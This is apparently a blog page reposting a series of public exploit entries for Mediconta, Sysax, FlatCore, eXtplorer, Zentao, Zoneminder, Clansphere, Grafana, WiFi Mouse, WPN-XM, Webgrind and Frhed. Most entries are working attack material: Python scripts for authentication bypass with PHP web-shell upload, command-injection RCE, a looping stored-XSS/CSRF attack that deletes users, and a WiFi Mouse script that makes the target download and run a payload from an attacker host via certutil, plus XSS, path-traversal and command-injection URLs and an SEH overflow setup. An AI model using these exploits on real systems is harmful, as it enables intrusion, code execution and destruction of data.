    # Exploit Title: Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path # Exploit Author: Luis Martinez # Discovery Date: 2022-10-05 # Vendor Homepage: https://www.infonetsoftware.com # Software Link : https://www.infonetsoftware.com/soft/instalar_Medicont_x.exe # Tested Version: 3.7.27 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "medicont3" | findstr /i /v """ servermedicontservice servermedicontservice C:\Program Files (x86)\medicont3\servermedicontservice.exe Auto # Service info: C:\>sc qc "servermedicontservice" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: servermedicontservice TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START (DELAYED) ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\medicont3\servermedicontservice.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : servermedicontservice DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  15. HireHackking

    Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC) # Discovery by: Luis Martinez # Discovery Date: 2022-10-05 # Vendor Homepage: https://www.sysax.com/ # Software Link: https://www.sysax.com/download/sysaxserv_setup.msi # Tested Version: 6.95 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to Produce the Crash: # 1.- Run python code: Sysax_Multi_Server_6.95.py # 2.- Open Sysax_Multi_Server_6.95.txt and copy content to clipboard # 3.- Open "Sysax Multi Server" # 4.- Manage Server Settings... # 5.- Administrative Settings -> Configure... # 6.- Clic "Enable web based administration and API access" # 7.- Login -> admin # 8.- Paste ClipBoard on "Password" # 9.- Save # 10.- Crashed #!/usr/bin/env python buffer = "\x41" * 800 f = open ("Sysax_Multi_Server_6.95.txt", "w") f.write(buffer) f.close()
  16. HireHackking

    FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: FlatCore CMS 2.1.1 -Stored Cross Site Scripting # Date: 2020-09-24 # Exploit Author: Sinem Şahin # Vendor Homepage: https://flatcore.org/ # Version: 2.1.1 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Go to the following url. => http://(HOST)/install/index.php 2- Write XSS Payload into the username of the user account. 3- Press "Save" button. XSS Payload ==> "<script>alert("usernameXSS")</script>
  17. HireHackking

    eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE) # Exploit Author: ErPaciocco # Author Website: https://erpaciocco.github.io # Vendor Homepage: https://extplorer.net/ # # Vendor: # ============== # extplorer.net # # Product: # ================== # eXtplorer <= v2.1.14 # # eXtplorer is a PHP and Javascript-based File Manager, it allows to browse # directories, edit, copy, move, delete, # search, upload and download files, create & extract archives, create new # files and directories, change file # permissions (chmod) and more. It is often used as FTP extension for popular # applications like Joomla. # # Vulnerability Type: # ====================== # Authentication Bypass (& Remote Command Execution) # # # Vulnerability Details: # ===================== # # eXtplorer authentication mechanism allows an attacker # to login into the Admin Panel without knowing the password # of the victim, but only its username. This vector is exploited # by not supplying password in POST request. # # # Tested on Windows # # # Reproduction steps: # ================== # # 1) Navigate to Login Panel # 2) Intercept authentication POST request to /index.php # 3) Remove 'password' field # 4) Send it and enjoy! # # # Exploit code(s): # =============== # # Run below PY script from CLI... # # [eXtplorer_auth_bypass.py] # # Proof Of Concept try: import requests except: print(f"ERROR: RUN: pip install requests") exit() import sys import time import urllib.parse import re import random import string import socket import time import base64 TARGET = None WORDLIST = None _BUILTIN_WL = [ 'root', 'admin', 'test', 'guest', 'info', 'adm', 'user', 'administrator' ] _HOST = None _PATH = None _SESSION = None _HEADERS = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3', 'Accept-Encoding': 'gzip, deflate, br', 'Connection': 'keep-alive' } def detect(): global _HOST global _PATH global _SESSION global _HEADERS _HOST = TARGET[0].split(':')[0] + '://' + TARGET[0].split('/')[2] _PATH = '/'.join(TARGET[0].split('/')[3:]).rstrip('/') _SESSION = requests.Session() raw = _SESSION.get(f"{_HOST}/{_PATH}/extplorer.xml", headers=_HEADERS, verify=False) if raw.status_code == 200: ver = re.findall("<version>(((\d+)\.?)+)<\/version>", raw.text, re.MULTILINE) if int(ver[0][2]) < 15: return True return False def auth_bypass(): global _HOST global _PATH global _SESSION global _HEADERS global WORDLIST global _BUILTIN_WL _HEADERS['X-Requested-With'] = 'XMLHttpRequest' params = {'option': 'com_extplorer', 'action': 'login', 'type': 'extplorer', 'username': 'admin', 'lang':'english'} if WORDLIST != None: if WORDLIST == _BUILTIN_WL: info(f"Attempting to guess an username from builtin wordlist") wl = _BUILTIN_WL else: info(f"Attempting to guess an username from wordlist: {WORDLIST[0]}") with open(WORDLIST[0], "r") as f: wl = f.read().split('\n') for user in wl: params = {'option': 'com_extplorer', 'action': 'login', 'type': 'extplorer', 'username': user, 'lang':'english'} info(f"Trying with {user}") res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False) if "successful" in res.text: return (user) else: res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False) if "successful" in res.text: return ('admin') return False def rce(): global _HOST global _PATH global _SESSION global _HEADERS global _PAYLOAD tokenReq = _SESSION.get(f"{_HOST}/{_PATH}/index.php?option=com_extplorer&action=include_javascript&file=functions.js") token = re.findall("token:\s\"([a-f0-9]{32})\"", tokenReq.text)[0] info(f"CSRF Token obtained: {token}") payload = editPayload() info(f"Payload edited to fit local parameters") params = {'option': 'com_extplorer', 'action': 'upload', 'dir': f"./{_PATH}", 'requestType': 'xmlhttprequest', 'confirm':'true', 'token': token} name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6)) files = {'userfile[0]':(f"{name}.php", payload)} req = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, files=files, verify=False) if "successful" in req.text: info(f"File {name}.php uploaded in root dir") info(f"Now set a (metasploit) listener and go to: {_HOST}/{_PATH}/{name}.php") def attack(): if not TARGET: error("TARGET needed") if TARGET: if not detect(): error("eXtplorer vulnerable instance not found!") exit(1) else: info("eXtplorer endpoint is vulnerable!") username = auth_bypass() if username: info("Auth bypassed!") rce() else: error("Username 'admin' not found") def error(message): print(f"[E] {message}") def info(message): print(f"[I] {message}") def editPayload(): # You can generate payload with msfvenom and paste below base64 encoded result # msfvenom -p php/meterpreter_reverse_tcp LHOST=<yourIP> LPORT=<yourPORT> -f base64 return base64.b64decode("PD9waHAgZWNobyAiSEFDS0VEISI7ICA/Pg==") def help(): print(r"""eXtplorer <= 2.1.14 exploit - Authentication Bypass & Remote Code Execution Usage: python3 eXtplorer_auth_bypass.py -t <target-host> [-w <userlist>] [-wb] Options: -t Target host. Provide target IP address (and optionally port). -w Wordlist for user enumeration and authentication (Optional) -wb Use built-in wordlist for user enumeration (Optional) -h Show this help menu. """) return True args = {"t" : (1, lambda *x: (globals().update(TARGET = x[0]))), "w" : (1, lambda *x: (globals().update(WORDLIST = x[0]))), "wb": (0, lambda *x: (globals().update(WORDLIST = _BUILTIN_WL))), "h" : (0, lambda *x: (help() and exit(0)))} if __name__ == "__main__": i = 1 [ args[ arg[1:]][1](sys.argv[i+1: (i:=i+1+args[arg[1:]][0]) ]) for arg in [k for k in sys.argv[i:] ] if arg[0] == '-' ] attack() else: help() # /////////////////////////////////////////////////////////////////////// # [Script examples] # # # c:\>python eXtplorer_auth_bypass.py -t https://target.com # c:\>python eXtplorer_auth_bypass.py -t http://target.com:1234 -w wordlist.txt # c:\>python eXtplorer_auth_bypass.py -t http://target.com -wb # Exploitation Method: # ====================== # Remote # [+] Disclaimer # The information contained within this advisory is supplied "as-is" with no # warranties or guarantees of fitness of use or otherwise. # Permission is hereby granted for the redistribution of this advisory, # provided that it is not altered except by reformatting it, and # that due credit is given. Permission is explicitly given for insertion in # vulnerability databases and similar, provided that due credit # is given to the author. The author is not responsible for any misuse of the # information contained herein and accepts no responsibility # for any damage caused by the use or misuse of this information.
  18. HireHackking

    Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE) # Exploit Author: mister0xf # Date: 2022-10-8 # Software Link: https://github.com/easysoft/zentaopms # Version: tested on 17.0 (probably works also on newer/older versions) # Tested On: Kali Linux 2022.2 # Exploit Tested Using: Python 3.10.4 # Vulnerability Description: # Zentao Project Management System 17.0 suffers from an authenticated command injection allowing # remote attackers to obtain Remote Code Execution (RCE) on the hosting webserver # Vulnerable Source Code: # /module/repo/model.php: # [...] # $client = $this->post->client; // <-- client is taken from the POST request # [...] # elseif($scm == 'Git') # { # if(!is_dir($path)) # { # dao::$errors['path'] = sprintf($this->lang->repo->error->noFile, $path); # return false; # } # # if(!chdir($path)) # { # if(!is_executable($path)) # { # dao::$errors['path'] = sprintf($this->lang->repo->error->noPriv, $path); # return false; # } # dao::$errors['path'] = $this->lang->repo->error->path; # return false; # } # # $command = "$client tag 2>&1"; // <-- command is injected here # exec($command, $output, $result); import requests,sys import hashlib from urllib.parse import urlparse from bs4 import BeautifulSoup def banner(): print(''' ::::::::: :::::::::: :::: ::: :::::::: ::::::::::: ::: :::::::: :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +#+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#++:++#++: +#+ +:+ +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+# ######### ########## ### #### ######## ########### ### ### ######## ''') def usage(): print('Usage: zenciao user password http://127.0.0.1/path') def main(): if ((len(sys.argv)-1) != 3): usage() banner() exit() #proxy = {'http':'http://127.0.0.1:8080'} banner() username = sys.argv[1] password = sys.argv[2] target = sys.argv[3] # initialize session object session = requests.session() home_url = target+'/index.php' rand_url = target+'/index.php?m=user&f=refreshRandom&t=html' login_url = target+'/index.php?m=user&f=login&t=html' create_repo_url = target+'/index.php?m=repo&f=create&objectID=0' r1 = session.get(home_url) soup = BeautifulSoup(r1.text, "html.parser") script_tag = soup.find('script') redirect_url = script_tag.string.split("'")[1] r2 = session.get(target+redirect_url) # get random value session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) res = session.get(rand_url) rand = res.text # compute md5(md5(password)+rand) md5_pwd = hashlib.md5((hashlib.md5(password.encode()).hexdigest()+str(rand)).encode()) # login request post_data = {"account":username,"password":md5_pwd.hexdigest(),"passwordStrength":1,"referer":"/zentaopms/www/","verifyRand":rand,"keepLogin":0,"captcha":""} my_referer = target+'/zentaopms/www/index.php?m=user&f=login&t=html' session.headers.update({'Referer': my_referer}) session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) response = session.post(login_url, data=post_data) # exploit rce # devops repo page r2 = session.get(create_repo_url) git_test_dir = '/home/' command = 'whoami;' exploit_post_data = {"SCM":"Git","name":"","path":git_test_dir,"encoding":"utf-8","client":command,"account":"","password":"","encrypt":"base64","desc":""} r3 = session.post(create_repo_url, data=exploit_post_data) print(r3.content) if __name__ == '__main__': main()
  19. HireHackking

    Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS) # Date: 10/01/2022 # Exploit Author: Trenches of IT # Vendor Homepage: https://github.com/ZoneMinder/zoneminder # Version: v1.36.26 # Tested on: Linux/Windows # CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 # Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/ # # Proof of Concept: # 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped) # 2 - Admin user logs navigates to http://<target>/zm/index.php?view=log # 3 - XSS executes delete function on target UID (user). import requests import re import time import argparse import sys def getOptions(args=sys.argv[1:]): parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1") parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True) parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True) parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True) parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True) parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True) options = parser.parse_args(args) return options options = getOptions(sys.argv[1:]) payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F</td></tr><script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'</script>" #Request to login and get the response headers loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password loginCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2"} loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"} response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies) zmHeaders = response.headers try: zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders)) finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';') except: print("[ERROR] Ensure the provided username and password is correct.") sys.exit(1) print("Collected the low privilege user session token: "+finalSession) #Request using response headers to obtain CSRF value csrfUrl = "http://"+options.ip+":"+options.port+"/zm/index.php?view=filter" csrfCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": '"' + finalSession + '"'} csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58&current=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"} response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies) zmBody = response.text extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody)) finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '') print("Collected the CSRF key for the log injection request: "+finalCsrfKey) print("Navigate here with an admin user: http://"+options.ip+"/zm/index.php?view=log") while True: #XSS Request xssUrl = "http://"+options.ip+"/zm/index.php" xssCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": finalSession} xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"} xssData = {"__csrf_magic": finalCsrfKey , "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"} response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData) print("Injecting payload: " + response.text) time.sleep(1)
  20. HireHackking

    Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS) # Exploit Author: Sinem Şahin # Date: 2022-10-08 # Vendor Homepage: https://www.csphere.eu/ # Version: 2011.4 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Go to the following url. => http://(HOST)/index.php?mod=buddys&action=create&id=925872 2- Write XSS Payload into the username of the buddy list create. 3- Press "Save" button. XSS Payload ==> "<script>alert("usernameXSS")</script> Link: https://github.com/sinemsahn/POC/blob/main/Create%20Clansphere%202011.4%20%22username%22%20xss.md
  21. HireHackking

    Grafana <=6.2.4 - HTML Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Grafana <=6.2.4 - HTML Injection # Date: 30-06-2019 # Exploit Author: SimranJeet Singh # Vendor Homepage: https://grafana.com/ # Software Link: https://grafana.com/grafana/download/6.2.4 # Version: 6.2.4 # CVE : CVE-2019-13068 The uri "public/app/features/panel/panel_ctrl.ts" in Grafana before 6.2.5 allows HTML Injection in panel drilldown links (via the Title or url field) Payload used - <img src="[image_URL]"><h1>Hello</h1>
  22. HireHackking

    WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE) # Date: 13-10-2022 # Author: Payal # Vendor Homepage: http://necta.us/ # Software Link: http://wifimouse.necta.us/#download # Version: 1.8.3.2 # Tested on: Windows 10 Pro Build 21H2 # Desktop Server software used by mobile app has PIN option which does not to prevent command input.# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input. #!/usr/bin/env python3 from socket import socket, AF_INET, SOCK_STREAMfrom time import sleepimport sysimport string target = socket(AF_INET, SOCK_STREAM) port = 1978 try: rhost = sys.argv[1] lhost = sys.argv[2] payload = sys.argv[3]except: print("USAGE: python " + sys.argv[0]+ " <target-ip> <local-http-server-ip> <payload-name>") exit() characters={ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} def openCMD(): target.sendto(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe def SendString(string): for char in string: target.sendto(bytes.fromhex("7574663820" + characters[char] + "0a"),(rhost,port)) # Sends Character hex with packet padding sleep(0.03) def SendReturn(): target.sendto(bytes.fromhex("6b657920203352544e"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app sleep(0.5) def exploit(): print("[+] 3..2..1..") sleep(2) openCMD() print("[+] *Super fast hacker typing*") sleep(1) SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Retrieving payload") sleep(3) SendString("C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Done! Check Your Listener?") def main(): target.connect((rhost,port)) exploit() target.close() exit() if __name__=="__main__": main()
  23. HireHackking

    WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2022-02-13 # Vendor Homepage: http://wpn-xm.org/ # Software Link : https://github.com/WPN-XM/WPN-XM/ # Tested Version: 0.8.6 # Tested on: Windows 10 using XAMPP # Vulnerability Type: Local File Inclusion (LFI) & directory traversal (path traversal) CVSS v3: 7.5 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CWE: CWE-829, CWE-22 Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows unauthenticated directory traversal and Local File Inclusion through the parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello (without php) GET request. Proof of concept: To detect: http://localhost/tools/webinterface/index.php?page=) The parameter "page" can be modified and load a php file in the server. Example, In C:\:hello.php with this content: C:\>type hello.php <?php echo "HELLO FROM C:\\hello.php"; ?> To Get hello.php in c:\ : http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello Note: hello without ".php". And you can see the PHP message into the browser at the start. Response: HELLO FROM C:\hello.php<!DOCTYPE html> <html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>WP?-XM Server Stack for Windows - 0.8.6</title> <meta name="description" content="WP?-XM Server Stack for Windows - Webinterface."> <meta name="author" content="Jens-André Koch" /> <link rel="shortcut icon" href="favicon.ico" /> # Vulnerability Type: reflected Cross-Site Scripting (XSS) CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the /tools/webinterface/index.php, in multiple parameters. Proof of concept: http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E
  24. HireHackking

    Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE) # Discovery by: Rafael Pedrero # Discovery Date: 2022-02-13 # Vendor Homepage: http://github.com/jokkedk/webgrind/ # Software Link : http://github.com/jokkedk/webgrind/ # Tested Version: 1.1 # Tested on: Windows 10 using XAMPP # Vulnerability Type: Remote Command Execution (RCE) CVSS v3: 9.8 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE: CWE-434 Vulnerability description: Remote Command Execution (RCE) vulnerability in Webgrind <= 1.1 allow remote unauthenticated attackers to inject OS commands via /<webgrind_path_directory>/index.php in dataFile parameter. Proof of concept: http://localhost/tools/webgrind/index.php?dataFile=0%27%26calc.exe%26%27&showFraction=0.9&op=function_graph And the calc.exe opens. Note: 0'&calc.exe&', & char is neccesary to execute the command. # Vulnerability Type: reflected Cross-Site Scripting (XSS) CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Webgrind v1.1 and before, does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the /<webgrind_path_directory>/index.php, in file parameter. Proof of concept: http://localhost/webgrind/index.php?op=fileviewer&file=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctitle%3E Response: ... <title> webgrind - fileviewer: </title><script>alert(1);</script><title> </title> <script type="text/javascript" charset="utf-8">
  25. HireHackking

    Frhed (Free hex editor) v1.6.0 - Buffer overflow

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Frhed (Free hex editor) v1.6.0 - Buffer overflow # Discovery by: Rafael Pedrero # Discovery Date: 2022-01-09 # Vendor Homepage: http://frhed.sourceforge.net/ # Software Link : http://frhed.sourceforge.net/ # Tested Version: 1.6.0 # Tested on: Windows 10 CVSS v3: 7.3 CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H CWE: CWE-119 Buffer overflow controlling the Structured Exception Handler (SEH) records in Frhed (Free hex editor) v1.6.0, and possibly other versions, may allow attackers to execute arbitrary code via a long file name argument. Proof of concept: Open Frhed.exe from command line with a large string in Arguments, more than 494 chars: File '<Frhed_PATH>\Frhed.exe' Arguments 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...' SEH chain of main thread Address SE handler 0018FC8C 41367141 35714134 *** CORRUPT ENTRY *** 0BADF00D [+] Examining SEH chain 0BADF00D SEH record (nseh field) at 0x0018fc8c overwritten with normal pattern : 0x35714134 (offset 494), followed by 876 bytes of cyclic data after the handler 0BADF00D ------------------------------ 'Targets' => [ [ '<fill in the OS/app version here>', { 'Ret' => 0x00401ba7, # pop ecx # pop ecx # ret - Frhed.exe (change this value by other without \x00) 'Offset' => 494 } ], ],